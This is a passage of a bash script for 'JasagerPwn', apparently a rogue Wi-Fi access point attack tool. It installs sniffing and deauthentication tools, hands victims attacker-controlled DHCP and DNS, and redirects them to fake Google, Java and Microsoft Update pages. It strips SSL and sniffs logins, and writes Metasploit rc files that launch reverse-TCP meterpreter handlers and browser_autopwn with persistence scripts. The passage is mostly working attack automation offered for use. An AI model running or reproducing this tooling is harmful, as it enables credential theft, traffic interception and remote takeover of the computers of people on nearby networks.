  444.   xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install dhcp3-server && update-rc.d -f dhcp3-server remove"
  445. fi
  446. # dsniff check
  447. if [ ! $dsniffcheck ]; then
  448.   echo -e "\e[01;31m[!]\e[00m No Dsniff suite was detected... Installing.."
  449.   xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version -  Dependencies Installation" -e "sudo apt-get -y install dsniff"
  450. fi
  451. # apache2 check
  452. if [ ! $apache2check ]; then
  453.   echo -e "\e[01;31m[!]\e[00m No apache2 server was detected... Installing.."
  454.   xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version -  Dependencies Installation" -e "sudo apt-get -y install apache2 && update-rc.d -f apache2 remove"
  455. elif [ ! $apache2phpcheck ]; then
  456.   echo -e "\e[01;31m[!]\e[00m No apache2 PHP5 module was detected... Installing.."
  457.   xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version -  Dependencies Installation" -e "sudo apt-get -y install libapache2-mod-php5"
  458. fi
  459. # php5 check
  460. if [ ! $php5check ]; then
  461.   echo -e "\e[01;31m[!]\e[00m No PHP5 was detected... Installing.."
  462.   xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version -  Dependencies Installation" -e "sudo apt-get -y install php5 php5-curl"
  463. fi
  464. # macchanger check
  465. if [ ! $macchangerCheck ]; then
  466.   echo -e "\e[01;31m[!]\e[00m No Macchanger was detected... Installing.."
  467.   xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version -  Dependencies Installation" -e "sudo apt-get -y install macchanger"
  468. fi
  469. # aircrack-ng check
  470. if [ ! $aircrackCheck ] && [ ! -e "/usr/local/bin/aircrack-ng" ]; then
  471.   echo -e "\e[01;31m[!]\e[00m No Aircrack-ng suite was detected... Installing.."
  472.   xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version -  Dependencies Installation" -e "sudo apt-get -y install aircrack-ng"
  473. fi
  474. #sslstrip check
  475. if [ ! -e "/usr/local/bin/sslstrip" ] && [ ! -e "/usr/bin/sslstrip" ]; then
  476.   xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version -  Dependencies Installation" -e "sudo apt-get -y install twisted-web linux-headers-`uname -r` build-essential gcc g++"
  477.   wget -q -P "/tmp" http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.8.tar.gz
  478.   tar xf /tmp/sslstrip-0.8.tar.gz -C "/tmp/"
  479.   chmod +x /tmp/sslstrip-0.8/setup.py
  480.   xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version -  Dependencies Installation" -e "python /tmp/sslstrip-0.8/setup.py install"
  481.   if [ -d "/tmp/sslstrip-0.8/" ]; then rm -rf /tmp/sslstrip-0.8/ ; fi
  482. fi
  483. #airdrop-ng check
  484. if [ ! -e "/usr/bin/airdrop-ng" ]; then
  485.   if [ -e "/pentest/wireless/airdrop-ng/install.py" ]; then
  486.     xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version -  Dependencies Installation" -e "sudo apt-get -y install python2.6 python2.6-dev python-psyco"
  487.     chmod +x /pentest/wireless/airdrop-ng/install.py
  488.     xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version -  Dependencies Installation" -e "python /pentest/wireless/airdrop-ng/install.py"
  489.     xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version -  Dependencies Installation" -e "airdrop-ng -u OUIUPDATE"
  490.   else
  491.     echo -e "\e[01;31m[!]\e[00m ERROR: Cant Find Airdrop-ng Installer.. Do it manually."
  492.   fi
  493. fi
  494. #metasploit check
  495. if [ ! -e "$msfpath/msfconsole" ]; then echo && echo -e "\e[01;31m[!]\e[00m ERROR: Metasploit wasnt found in: "$msfpath"" && echo && cleanup; fi
  496. #SET check
  497. if [ ! -e "$SETpath/set-automate" ]; then
  498.     echo && echo -e "\e[01;31m[!]\e[00m ERROR: Social Engineering Toolkit wasnt found in: "$SETpath"" && echo && cleanup
  499. else
  500.     # python pefile module - thanks redmeat_uk
  501.     if [ ! -e "$SETpath/src/payloadgen/pefile.py" ]; then
  502.       echo -e "\e[01;31m[!]\e[00m No Python PEfile module was detected... Installing.."
  503.       if [ -e "/tmp/pefile-1.2.10-102.tar.gz" ]; then rm -rf /tmp/pefile-1.2.10-102* ; fi
  504.       wget -q -P "/tmp" http://pefile.googlecode.com/files/pefile-1.2.10-102.tar.gz
  505.       tar xf /tmp/pefile-1.2.10-102.tar.gz -C /tmp/
  506.       mv /tmp/pefile-1.2.10-102/pefile.py $SETpath/src/payloadgen/
  507.       chmod +x $SETpath/src/payloadgen/pefile.py
  508.       if [ -e "$SETpath/src/payloadgen/pefile.py" ]; then
  509.         echo -e "\e[01;31m[!]\e[00m Installation Complete!"
  510.       elif [ ! -e "$SETpath/src/payloadgen/pefile.py" ]; then
  511.         echo -e "\e[01;31m[!]\e[00m Installation Failed!"
  512.       fi
  513.       if [ -d "/tmp/pefile-1.2.10-102/" ]; then rm -rf /tmp/pefile-1.2.10-102/ ; fi
  514.     fi
  515. fi
  516.  
  517. #put up monitor interfaces
  518. #loopbreak=`ifconfig | grep mon4 | awk '{print $1}' | cut -b 4`
  519. monAttempts="0"
  520. while [ ! $moncheck ];
  521. do
  522.     if [ $monAttempts -ge "3" ]; then echo -e "\e[01;31m[!]\e[00m FATAL: Couldn't Start $MIFACE" && cleanup; fi
  523.     #if [ ! $loopbreak ]; then sleep 1; else break; fi
  524.     #ATKcheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4`
  525.     moncheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4`
  526.     xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Start $MIFACE" -e "airmon-ng start $WIFACE"
  527.     moncheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4`
  528.     #ATKcheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4`
  529.     monAttempts=$(($monAttempts+1))
  530. done
  531. #copy over DNS compatable persistence script
  532. if [ ! -e "$msfpath/scripts/meterpreter/persistence_dns.rb" ]; then cp src/persistence_dns.rb "$msfpath/scripts/meterpreter/" ; fi
  533. #cleanup www folders
  534. if [ -d "$Gwww/" ] ; then rm -rf $Gwww/ ; fi
  535. if [ -d "$Jwww/" ] ; then rm -rf $Jwww/ ; fi
  536. if [ -d "$Fwww/" ] ; then rm -rf $Fwww/ ; fi
  537. sleep 1 #patience
  538. if [ ! -d "$Jwww" ]; then mkdir $Jwww/ ; fi
  539. if [ ! -d "$Fwww" ]; then mkdir $Fwww/ ; fi
  540. if [ ! -d "$Gwww" ]; then mkdir $Gwww/ ; fi
  541. if [ ! -d "/tmp/collected" ]; then mkdir /tmp/collected/ ; fi
  542. #backup old default index.html
  543. if [ -e /var/www/index.htm ]; then
  544.         mv /var/www/index.htm /var/www/index.htm.OLD
  545. elif [ -e /var/www/index.html ]; then
  546.         mv /var/www/index.html /var/www/index.html.OLD
  547. fi
  548. #fake update page
  549. if [ -d "$Fwww/" ] ; then
  550.    cp -rf src/wwwFakeupdate/* $Fwww/
  551. fi
  552. # google page
  553. cp -rf src/wwwGoogle/* $Gwww/
  554. # java required page
  555. cp -rf src/wwwJava/* $Jwww/
  556.  
  557. if [ ! $googleRev ]; then
  558.    echo -n
  559. elif [ $googleRev -gt $rev ]; then
  560.    echo
  561.    echo -e "\e[01;31m[!]\e[00m UPDATE: There is an update available!!! Run ./jasagerPwn -u"
  562.    echo
  563. fi
  564.  
  565. echo -e "\e[01;32m[>]\e[00m Creating scripts..."
  566. #Dynamic varaibles incase SET changes, which it does and will.
  567. SETapache=`cat $SETpath/config/set_config | grep -n "APACHE_SERVER" | awk -F: '{print $1}'`
  568. SETapacheDIR=`cat $SETpath/config/set_config | grep -n "APACHE_DIRECT" | awk -F: '{print $1}'`
  569. SETredirect=`cat $SETpath/config/set_config | grep -n "AUTO_REDIRECT" | awk -F: '{print $1}'`
  570. SETmetscript=`cat $SETpath/config/set_config | grep -n "METERPRETER_MULTI_SCRIPT" | awk -F: '{print $1}'`
  571. SETrepeater=`cat $SETpath/config/set_config | grep -n "JAVA_REPEATER=OFF" | awk -F: '{print $1}'`
  572.  
  573. #SET_CONFIG Text Parsing Variables - for javapwn
  574. APACHESVR=`cat $SETpath/config/set_config | grep "APACHE_SERVER=ON"`
  575. APACHEDIR=`cat $SETpath/config/set_config | grep "/var/www/javapwn"`
  576. meterpreterS=`cat $SETpath/config/set_config | grep "METERPRETER_MULTI_SCRIPT=ON"`
  577. AREDIRECT=`cat $SETpath/config/set_config | grep "AUTO_REDIRECT=OFF"`
  578. JREPEATER=`cat $SETpath/config/set_config | grep "JAVA_REPEATER=ON"`
  579. #backup orignal SET config
  580. if [ ! -e "$SETpath/config/set_config.ORIGINAL" ]; then
  581.       cp -f $SETpath/config/set_config $SETpath/config/set_config.ORIGINAL
  582. fi
  583. #Customize SET config to how we want it..
  584. if [ ! "$APACHESVR" ]; then
  585.     sed ''${SETapache}'s!APACHE_SERVER=OFF!APACHE_SERVER=ON!g' $SETpath/config/set_config > $SETpath/config/set_config2
  586. # > $SETpath/config/set_configTMP && mv set_configTMP set_config
  587. elif [ "$APACHESVR" ]; then
  588.     mv $SETpath/config/set_config $SETpath/config/set_config2
  589. fi
  590. sleep 2
  591. if [ ! "$APACHEDIR" ]; then
  592.    sed ''${SETapacheDIR}'s!APACHE_DIRECTORY=/var/www!APACHE_DIRECTORY=/var/www/google!g' $SETpath/config/set_config2 > $SETpath/config/set_config3
  593. # > $SEETpath/config/set_configTMP && mv set_configTMP set_config
  594.    #mv $SETpath/config/set_config $SETpath/config/set_config.leg3nd
  595. elif [ "$APACHEDIR" ]; then
  596.     mv $SETpath/config/set_config2 $SETpath/config/set_config3
  597. fi
  598. sleep 2
  599. if [ ! "${AREDIRECT}" ]; then
  600.     sed ''${SETredirect}'s!AUTO_REDIRECT=ON!AUTO_REDIRECT=OFF!g' $SETpath/config/set_config3 > $SETpath/config/set_config4
  601. # > $SETpath/config/set_configTMP && mv set_configTMP set_config
  602. elif [ ! "$AREDIRECT" ]; then
  603.     mv $SETpath/config/set_config3 $SETpath/config/set_config4
  604. fi
  605. sleep 2
  606. if [ ! "${JREPEATER}" ]; then
  607.     sed ''${SETrepeater}'s!JAVA_REPEATER=OFF!JAVA_REPEATER=ON!g' $SETpath/config/set_config4 > $SETpath/config/set_config5
  608. # > $SETpath/config/set_configTMP && mv set_configTMP set_config
  609. elif [ "$JREPEATER" ]; then
  610.     mv $SETpath/config/set_config4 $SETpath/config/set_config5
  611. fi
  612. sleep 2
  613. if [ "$autoMetScript" -eq "1" ] && [ ! "$JREPEATER" ]; then
  614.   #edit for meterpreter script mode
  615. #  if [ ! "$meterpreterS" ]; then
  616.       sed ''${SETmetscript}'s!METERPRETER_MULTI_SCRIPT=OFF!METERPRETER_MULTI_SCRIPT=ON!g' $SETpath/config/set_config5 > $SETpath/config/set_config6
  617. # > $SETpath/config/set_configTMP && mv set_configTMP set_config
  618. #  fi
  619. elif [ "$autoMetScript" -eq "1" ] && [ "$JREPEATER" ]; then
  620.         sed ''${SETmetscript}'s!METERPRETER_MULTI_SCRIPT=OFF!METERPRETER_MULTI_SCRIPT=ON!g' $SETpath/config/set_config4 > $SETpath/config/set_config5
  621. fi
  622. sleep 2
  623. #move config to right spot
  624. if [ -e "$SETpath/config/set_config6" ]; then
  625.    mv $SETpath/config/set_config6 $SETpath/config/set_config
  626. fi
  627. if [ "$autoMetScript" -eq "0" ] && [ -e "$SETpath/config/set_config5" ] ; then
  628.     mv $SETpath/config/set_config5 $SETpath/config/set_config
  629. elif [ "$autoMetScript" -eq "1" ] && [ -e "$SETpath/config/set_config5" ] ; then
  630.     mv $SETpath/config/set_config5 $SETpath/config/set_config
  631. elif [ "$autoMetScript" -eq "1" ] && [ -e "$SETpath/config/set_config6" ] ; then
  632.     mv $SETpath/config/set_config6 $SETpath/config/set_config
  633. fi
  634.  
  635. sleep 3
  636. #make sure we clean up
  637. if [ -e "$SETpath/config/set_config2" ]; then rm $SETpath/config/set_config2 ; fi
  638. if [ -e "$SETpath/config/set_config3" ]; then rm $SETpath/config/set_config3 ; fi
  639. if [ -e "$SETpath/config/set_config4" ]; then rm $SETpath/config/set_config4 ; fi
  640. if [ -e "$SETpath/config/set_config5" ]; then rm $SETpath/config/set_config5 ; fi
  641. if [ -e "$SETpath/config/set_config6" ]; then rm $SETpath/config/set_config6 ; fi
  642.  
  643. #Make loop script to isnure our DNS and IP
  644. cp /etc/resolv.conf /etc/resolv.conf.ORIGINAL
  645. echo "while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done &" > /tmp/resolv.sh
  646. chmod +x /tmp/resolv.sh
  647. xterm -geometry 0x0+0+0 -e "bash /tmp/resolv.sh" &
  648. dnsID2=`echo $!`
  649.  
  650. #Background loop to parse SSLstrip logins
  651. #while true; do SSLparse && sleep 5 ; done &
  652. #parseID=`echo $!`
  653.  
  654. #DHCP CONF
  655. if [ -e "/etc/dhcp3/dhcpd.conf" ]; then mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.ORIGINAL ; fi
  656. if [ -e "/tmp/dhcpd.conf" ]; then rm /tmp/dhcpd.conf; fi
  657. echo -e "#fakeAP.dhcp
  658. ddns-update-style none;
  659. one-lease-per-client false;
  660. authoritative;
  661. ignore client-updates; # Ignore all client requests for DDNS update
  662. default-lease-time 60; # 24 hours=86400
  663. max-lease-time 72;  # 48 hours=172800
  664. log-facility local7;\n
  665.  
  666. subnet 192.168.10.0 netmask 255.255.255.0 {
  667.         interface $FONIFACE;
  668.         range 192.168.10.3 192.168.10.250;
  669.         option routers 192.168.10.2;
  670.         option subnet-mask 255.255.255.0;
  671.         option broadcast-address 192.168.10.255;
  672.         option domain-name-servers 192.168.10.2;
  673.         option domain-name \"$DomainName\";
  674.         allow unknown-clients;
  675. }" >> /etc/dhcp3/dhcpd.conf
  676.  
  677. #backup original SET templates
  678. if [ -e "$SETpath/src/html/templates/java/index.template" ]; then
  679.    mv "$SETpath/src/html/templates/java/index.template" "$SETpath/src/html/templates/java/index.template.ORIGINAL"
  680.    cp -rf src/wwwJava/* $SETpath/src/html/templates/java/
  681. else
  682.    cp -rf src/wwwJava/* $SETpath/src/html/templates/java/
  683. fi
  684.  
  685. if [ -e "$SETpath/src/html/templates/google/index.template" ]; then
  686.    mv "$SETpath/src/html/templates/google/index.template" "$SETpath/src/html/templates/google/index.template.ORIGINAL"
  687.    cp -rf src/wwwGoogle/* $SETpath/src/html/templates/google/
  688. else
  689.    cp -rf src/wwwGoogle/* $SETpath/src/html/templates/google/
  690. fi
  691.  
  692. #Airdrop-ng Deauther CONF
  693. #ourAPmac=`macchanger -s $MIFACE | awk '{ print $3 }' | tr '[a-z]' '[A-Z]'`
  694.  
  695. if [ -e "/tmp/deauth.conf" ] ; then rm "/tmp/deauth.conf" ; fi
  696. echo "# Jasager - deauth.conf v$version
  697. a/$ourAPmac|any
  698. a/00:00:00:00:00:00|any
  699. d/any|any"  > /tmp/deauth.conf
  700.  
  701. #Add our wifi gateway if needed
  702. wifiMAC=`ifconfig $IFACE | grep "HWaddr" | awk '{print $5}' | tr "[a-z]" "[A-Z]"`
  703. if [ $WiFiMODE -eq "1" ]; then
  704.    newIFACEmac=`iwconfig $IFACE | grep "Access Point" | awk '{print $6}'`
  705.    echo "a/$newIFACEmac|$wifiMAC" >> /tmp/deauth.conf
  706. #elif [ ! $wifiMAC ] || [ ! $newIFACEmac ]; then
  707.     #echo
  708.     #echo -e "\e[01;31m[!]\e[00m Error: Your Wireless Connection Has no MAC Address.."
  709.     #echo
  710. fi
  711.  
  712. #Host file - MITM WEBSITE
  713. if test -e /tmp/BP.dns; then rm /tmp/BP.dns; fi
  714. echo "$fonIP *" > /tmp/BP.dns
  715.  
  716. #Vhosts javapwn
  717. vhost="/etc/apache2/sites-available/javapwn"
  718. if [ -e "$vhost" ] ; then rm "$vhost"; fi
  719. echo "<VirtualHost *:80>
  720.         ServerAdmin webmaster@localhost
  721.        
  722.         DocumentRoot $Jwww
  723.         <Directory />
  724.                 Options FollowSymLinks
  725.                 AllowOverride None
  726.         </Directory>
  727.         <Directory $Jwww>
  728.                 Options Indexes FollowSymLinks MultiViews
  729.                 AllowOverride None
  730.                 Order allow,deny
  731.                 allow from all
  732.         </Directory>
  733.  
  734.         ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
  735.         <Directory "/usr/lib/cgi-bin">
  736.                 AllowOverride None
  737.                 Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
  738.                 Order allow,deny
  739.                 Allow from all
  740.         </Directory>
  741.  
  742.         ErrorLog /var/log/apache2/error.log
  743.  
  744.         # Possible values include: debug, info, notice, warn, error, crit,
  745.         # alert, emerg.
  746.         LogLevel warn
  747.  
  748.         CustomLog /var/log/apache2/access.log combined
  749.  
  750.    Alias /doc/ "/usr/share/doc/"
  751.    <Directory "/usr/share/doc/">
  752.        Options Indexes MultiViews FollowSymLinks
  753.        AllowOverride None
  754.        Order deny,allow
  755.        Deny from all
  756.        Allow from 127.0.0.0/255.0.0.0 ::1/128
  757.    </Directory>
  758. ErrorDocument 403 /index.html
  759. ErrorDocument 404 /index.html
  760. </VirtualHost>" >> $vhost
  761.  
  762. #Vhosts google
  763. vhost2="/etc/apache2/sites-available/google"
  764. if [ -e "$vhost2" ] ; then rm "$vhost2"; fi
  765. echo "<VirtualHost *:80>
  766.         ServerAdmin webmaster@localhost
  767.        
  768.         DocumentRoot $Gwww
  769.         <Directory />
  770.                 Options FollowSymLinks
  771.                 AllowOverride None
  772.         </Directory>
  773.         <Directory $Gwww>
  774.                 Options Indexes FollowSymLinks MultiViews
  775.                 AllowOverride None
  776.                 Order allow,deny
  777.                 allow from all
  778.         </Directory>
  779.  
  780.         ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
  781.         <Directory "/usr/lib/cgi-bin">
  782.                 AllowOverride None
  783.                 Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
  784.                 Order allow,deny
  785.                 Allow from all
  786.         </Directory>
  787.  
  788.         ErrorLog /var/log/apache2/error.log
  789.  
  790.         # Possible values include: debug, info, notice, warn, error, crit,
  791.         # alert, emerg.
  792.         LogLevel warn
  793.  
  794.         CustomLog /var/log/apache2/access.log combined
  795.  
  796.    Alias /doc/ "/usr/share/doc/"
  797.    <Directory "/usr/share/doc/">
  798.        Options Indexes MultiViews FollowSymLinks
  799.        AllowOverride None
  800.        Order deny,allow
  801.        Deny from all
  802.        Allow from 127.0.0.0/255.0.0.0 ::1/128
  803.    </Directory>
  804. ErrorDocument 403 /index.html
  805. ErrorDocument 404 /index.html
  806. </VirtualHost>" >> $vhost2
  807.  
  808. #Vhosts fakeupdate
  809. vhost3="/etc/apache2/sites-available/fakeupdate"
  810. if [ -e "$vhost3" ] ; then rm "$vhost3"; fi
  811. echo "<VirtualHost *:80>
  812.         ServerAdmin webmaster@localhost
  813.        
  814.         DocumentRoot $Fwww
  815.         <Directory />
  816.                 Options FollowSymLinks
  817.                 AllowOverride None
  818.         </Directory>
  819.         <Directory $Fwww>
  820.                 Options Indexes FollowSymLinks MultiViews
  821.                 AllowOverride None
  822.                 Order allow,deny
  823.                 allow from all
  824.         </Directory>
  825.  
  826.         ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
  827.         <Directory "/usr/lib/cgi-bin">
  828.                 AllowOverride None
  829.                 Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
  830.                 Order allow,deny
  831.                 Allow from all
  832.         </Directory>
  833.  
  834.         ErrorLog /var/log/apache2/error.log
  835.  
  836.         # Possible values include: debug, info, notice, warn, error, crit,
  837.         # alert, emerg.
  838.         LogLevel warn
  839.  
  840.         CustomLog /var/log/apache2/access.log combined
  841.  
  842.    Alias /doc/ "/usr/share/doc/"
  843.    <Directory "/usr/share/doc/">
  844.        Options Indexes MultiViews FollowSymLinks
  845.        AllowOverride None
  846.        Order deny,allow
  847.        Deny from all
  848.        Allow from 127.0.0.0/255.0.0.0 ::1/128
  849.    </Directory>
  850. ErrorDocument 403 /index.php
  851. ErrorDocument 404 /index.php
  852. </VirtualHost>" >> $vhost3
  853.  
  854. #SET automate scripts, can be TOUCHY.
  855. #run as template rather then imported
  856. if [ -e "/tmp/auto-java2" ] ; then rm "/tmp/auto-java2" ; fi
  857. echo -e "\n2\n1\n1\n1\n2\n16" > /tmp/auto-java2
  858. # echo -e "2
  859. # 1
  860. # 1
  861. # 1
  862. # 2
  863. # 16" > /tmp/auto-java2
  864. #run as template rather then imported
  865. if [ -e "/tmp/auto-google2" ] ; then rm "/tmp/auto-google2" ; fi
  866. echo -e "\n2\n1\n1\n3\n2\n16" > /tmp/auto-google2
  867. # echo -e "2
  868. # 1
  869. # 1
  870. # 3
  871. # 2
  872. # 16" > /tmp/auto-google2
  873. #DIFFERENT METHOD OF USING THE TEMPLATES.
  874. #fancy clone of java DL website - not used
  875. # if [ -e "/tmp/auto-java" ] ; then rm "/tmp/auto-java" ; fi
  876. # echo -e "2
  877. # 1
  878. # 3
  879. # $pwd/src/wwwJava/
  880. # 2
  881. # 16" > /tmp/auto-java
  882. #fancy clone of google - not used
  883. # if [ -e "/tmp/auto-google" ] ; then rm "/tmp/auto-google" ; fi
  884. # echo -e "2
  885. # 1
  886. # 3
  887. # $pwd/src/wwwGoogle/
  888. # 2
  889. # 16" > /tmp/auto-google
  890. if [ $autoMetScript -eq 1 ]; then
  891.     metScript
  892.     #Metasploit rc w/ auto script
  893.     if [ -e "/tmp/msfrc" ] ; then rm "/tmp/msfrc" ; fi
  894.     echo -e "use exploit/multi/handler
  895.    set PAYLOAD windows/meterpreter/reverse_tcp
  896.    set LHOST $ourIP
  897.    set ExitOnSession false
  898.    set InitialAutorunScript multiscript -rc /pentest/exploits/SET/src/program_junk/multi_meter.file
  899.    exploit -j" > /tmp/msfrc
  900. #Metasploit rc w/ auto script BP
  901. if [ -e "/tmp/msfrcBP" ] ; then rm "/tmp/msfrcBP" ; fi
  902.     echo -e "use auxiliary/server/browser_autopwn
  903.    set PAYLOAD windows/meterpreter/reverse_tcp
  904.    set LHOST $ourIP
  905.    set SRVPORT 80
  906.    set SRVHOST $ourIP
  907.    set URIPATH /
  908.    set ExitOnSession false
  909.    set InitialAutorunScript multiscript -rc /pentest/exploits/SET/src/program_junk/multi_meter.file
  910.    run -j" > /tmp/msfrcBP
  911.  
  912. elif [ $autoMetScript -eq 0 ]; then
  913.     #Metasploit rc no auto script
  914.     if [ -e "/tmp/msfrc" ] ; then rm "/tmp/msfrc" ; fi
  915.     echo -e "use exploit/multi/handler
  916.    set PAYLOAD windows/meterpreter/reverse_tcp
  917.    set LHOST $ourIP
  918.    set ExitOnSession false
  919. exploit -j" > /tmp/msfrc
  920. #Metasploit rc no auto script BP
  921. if [ -e "/tmp/msfrcBP" ] ; then rm "/tmp/msfrcBP" ; fi
  922.     echo -e "use auxiliary/server/browser_autopwn
  923.    set PAYLOAD windows/meterpreter/reverse_tcp
  924.    set LHOST $ourIP
  925.    set SRVPORT 80
  926.    set SRVHOST $ourIP
  927.    set URIPATH /
  928.    set ExitOnSession false
  929.    run -j" > /tmp/msfrcBP
  930. fi
  931. sleep 1
  932. #USING DNS VIA IPTABLES TO GATEWAY
  933. #echo -e "\e[01;32m[>]\e[00m Starting DNS services..."
  934. #xterm -geometry 75x5+0+94 -T "JasagerPwn v$version - FakeDNS" -e "dnsspoof -i $FONIFACE -f /tmp/Jasager.dns" &
  935. #xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - FakeDNS" -e "dnsspoof -i $FONIFACE -f /tmp/Jasager.dns" &
  936. #xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - Tunnel DNS" -e "while true; do sleep 60 && echo 'Tunneling $ourIP DNS Requests through $gatewayIP...';done" &
  937. #xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - DNS" -e "dnsmasq -C /tmp/Jasager.dnsmasq" &
  938. #DNSID=`echo $!`
  939. echo -e "\e[01;32m[>]\e[00m Enabling ipv4 Forwarding..."
  940. xterm -geometry 0x0+0+0 -e "modprobe tun" &
  941. echo "1" > /proc/sys/net/ipv4/ip_forward
  942. #tail messages for DHCP info
  943. xterm -geometry 75x16+0+509 -bg black -fg red -T "[JasagerPwn-DHCP] v$version" -e "tail -f /var/log/messages | grep DHCP" &
  944. messageID=`echo $!`
  945. echo -e "\e[01;32m[>]\e[00m Starting up DHCP3..."
  946. xterm -geometry 75x9+0+474 -bg black -fg green -T "Starting DHCP3 Server" -e "/etc/init.d/dhcp3-server start" &
  947.  
  948. echo -e "\e[01;32m[>]\e[00m Loading URL Snarf/Driftnet..."
  949. xterm -geometry 0x0+0+0 -e "driftnet -v -s -i $FONIFACE" &
  950. xterm -geometry 75x24+464+405 -bg black -fg green -T "[JasagerPwn-DSniff] v$version" -e "dsniff -i $FONIFACE" &
  951. dsniffID=`echo $!`
  952. xterm -geometry 75x37+0+0 -bg black -fg green -T "[JasagerPwn-URLSnarf] v$version" -e "urlsnarf -i $FONIFACE" &
  953.  
  954. echo -e "\e[01;32m[>]\e[00m Setting up IP Tables..."
  955. IPTABLES
  956.  
  957. echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version Started! More @ www.info-s3curity.com"
  958. echo
  959.  
  960. #MAIN OPTIONS FOR AP ATTACKS
  961. while true
  962. do
  963.         echo
  964.         echo
  965.         echo
  966.         ifconfig $FONIFACE $fonIP
  967.         echo -e "\e[01;31m[+][-----------------------------------------------------------------][+]\e[00m"
  968.         echo -e "\e[01;31m[+][==========================-Main Menu-============================][+]\e[00m"
  969.         echo -e "\e[01;31m[+][-----------------------------------------------------------------][+]\e[00m"
  970.         #echo -e "\e[01;32m[!]\e[00m Press [S]niff, [F]akeUpdate, [D]eAuth, [B]rowserPwn, [J]ava Attack, e[X]it "
  971.                 if [ $sniffing -eq 0 ] && [ $browserpwn -eq 0 ] && [ $fakeupdate -eq 0 ] && [ $javaATK -eq 0 ]; then
  972.                 echo -e "\e[01;36m                   [*] Attack Status: Idle..\e[00m"
  973.                 elif [ $sniffing -eq 1 ]; then
  974.                 echo -e "\e[01;31m                   [*] Attack Status: SSLstrip & Sniffing\e[00m"
  975.                 elif [ $browserpwn -eq 1 ]; then
  976.                 echo -e "\e[01;31m                   [*] Attack Status: MSF Browser-AutoPwn\e[00m"
  977.                 elif [ $fakeupdate -eq 1 ]; then
  978.                 echo -e "\e[01;31m                   [*] Attack Status: MSF Fake Update\e[00m"
  979.                 elif [ $javaATK -eq 1 ]; then
  980.                 echo -e "\e[01;31m                   [*] Attack Status: SET Java Applet\e[00m"
  981.                 fi
  982.         echo -e "\e[01;32m[-]\e[00m [1][S] = Sniff The APs Network."
  983.         echo -e "\e[01;32m[-]\e[00m [2][F] = Redirect LAN to Fake Microsoft Update Page. (MS Only)"
  984.         echo -e "\e[01;32m[-]\e[00m [3][B] = Redirect LAN to Metasploit BrowserAutopwn. (Any OS)"
  985.         echo -e "\e[01;32m[-]\e[00m [4][J] = Redirect LAN to Java Applet Page. (Any OS) "
  986.         echo -e "\e[01;32m[-]\e[00m [5][D] = De-Authorize Clients on other APs."
  987.         echo -e "\e[01;32m[-]\e[00m [6][N] = Adjust Network and Internet Settings"
  988.         echo -e "\e[01;32m[-]\e[00m [7][X] = Exit Jasager Script"
  989.         echo -n -e "\e[01;31m                   [?] Choose an attack for AP:\e[00m "
  990.         read -e CONFIRM3
  991.         echo
  992.         case $CONFIRM3 in
  993.                 s|S|sniff|Sniff|1)
  994.                 if [ $browserpwn -eq 1 ]; then
  995.                                 echo -e "\e[01;31m[!]\e[00m Error: Cant run with browserPwn. IPtables Conflict."
  996.                 elif [ $javaATK -eq 1 ]; then
  997.                                 echo -e "\e[01;31m[!]\e[00m Error: Cant run with Java Applet Attack. IPtables Conflict."
  998.                 elif [ $fakeupdate -eq 1 ]; then
  999.                                 echo -e "\e[01;31m[!]\e[00m Error: Cant run with FakeUpdate. IPtables Conflict."
  1000.                 elif [ $sniffing -eq 0 ]; then
  1001.                 iptables -t nat -A PREROUTING --in-interface $FONIFACE -p tcp --destination-port 80 -j REDIRECT --to-ports $sslport
  1002.                 xterm -geometry 75x3+1-25 -bg black -fg green -e "sslstrip -l $sslport && sleep 3" &
  1003.                         if [ -e sslstrip.log ]; then
  1004.                                 xterm -geometry 75x24+464+65 -bg black -fg green -T "SSLStrip Sniffing" -e "tail -f sslstrip.log" &
  1005.                                 TAILPID=`echo $!`
  1006.                         else
  1007.                                 touch sslstrip.log
  1008.                                 xterm -geometry 75x24+464+65 -bg black -fg green -T "SSLStrip Sniffing" -e "tail -f sslstrip.log" &
  1009.                                 TAILPID=`echo $!`
  1010.                         fi
  1011.                                 echo -e "\e[01;33m[!]\e[00m\e[00m Attack Started: SSLStripping / Sniffing"
  1012.                                 wasSniffing="1"
  1013.                                 sniffing="1"
  1014.                 elif [ $sniffing -eq 1 ]; then
  1015.                                 echo -e "\e[01;31m[!]\e[00m Error: Your Already Sniffing!!"
  1016.                 fi
  1017.                 #xterm -geometry 75x20+464+288 -bg black -fg green -e "dsniff -i $FONIFACE" &
  1018.                 ;;
  1019.                 J|j|java|Java|4)
  1020.                 if [ $browserpwn -eq 1 ]; then
  1021.                    echo -e "\e[01;31m[!]\e[00m Error: Cant run with browserPwn. Port Conflict."
